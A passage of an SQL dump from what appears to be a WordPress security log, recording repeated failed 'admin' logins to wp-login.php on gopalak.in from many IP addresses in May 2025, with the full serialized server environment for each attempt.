Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32768\";s:11:\"REMOTE_ADDR\";s:14:\"192.64.117.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746960249.8877399;s:12:\"REQUEST_TIME\";i:1746960249;}}','192.64.117.254',0,'2025-05-11 16:14:11','1970-01-01 00:00:00'),(95489,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56462\";s:11:\"REMOTE_ADDR\";s:14:\"199.188.200.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746960645.8819709;s:12:\"REQUEST_TIME\";i:1746960645;}}','199.188.200.55',0,'2025-05-11 16:20:47','1970-01-01 00:00:00'),(95490,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51774\";s:11:\"REMOTE_ADDR\";s:12:\"78.128.8.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746961041.325155;s:12:\"REQUEST_TIME\";i:1746961041;}}','78.128.8.148',0,'2025-05-11 16:27:23','1970-01-01 00:00:00'),(95491,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48334\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.123\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746961446.6791749;s:12:\"REQUEST_TIME\";i:1746961446;}}','198.187.29.123',0,'2025-05-11 16:34:08','1970-01-01 00:00:00'),(95492,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55062\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.120.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746961844.9444721;s:12:\"REQUEST_TIME\";i:1746961844;}}','198.54.120.130',0,'2025-05-11 16:40:46','1970-01-01 00:00:00'),(95493,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60592\";s:11:\"REMOTE_ADDR\";s:14:\"116.193.190.94\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746962246.6123681;s:12:\"REQUEST_TIME\";i:1746962246;}}','116.193.190.94',0,'2025-05-11 16:47:28','1970-01-01 00:00:00'),(95494,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47602\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746962651.496294;s:12:\"REQUEST_TIME\";i:1746962651;}}','209.172.2.50',0,'2025-05-11 16:54:13','1970-01-01 00:00:00'),(95495,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52288\";s:11:\"REMOTE_ADDR\";s:14:\"38.242.195.184\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746963059.7333059;s:12:\"REQUEST_TIME\";i:1746963059;}}','38.242.195.184',0,'2025-05-11 17:01:01','1970-01-01 00:00:00'),(95496,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37770\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746963465.8285301;s:12:\"REQUEST_TIME\";i:1746963465;}}','103.191.76.181',0,'2025-05-11 17:07:47','1970-01-01 00:00:00'),(95497,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46018\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.114.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746963870.1570649;s:12:\"REQUEST_TIME\";i:1746963870;}}','198.54.114.5',0,'2025-05-11 17:14:31','1970-01-01 00:00:00'),(95498,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35904\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.141\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746964275.5342729;s:12:\"REQUEST_TIME\";i:1746964275;}}','67.223.118.141',0,'2025-05-11 17:21:17','1970-01-01 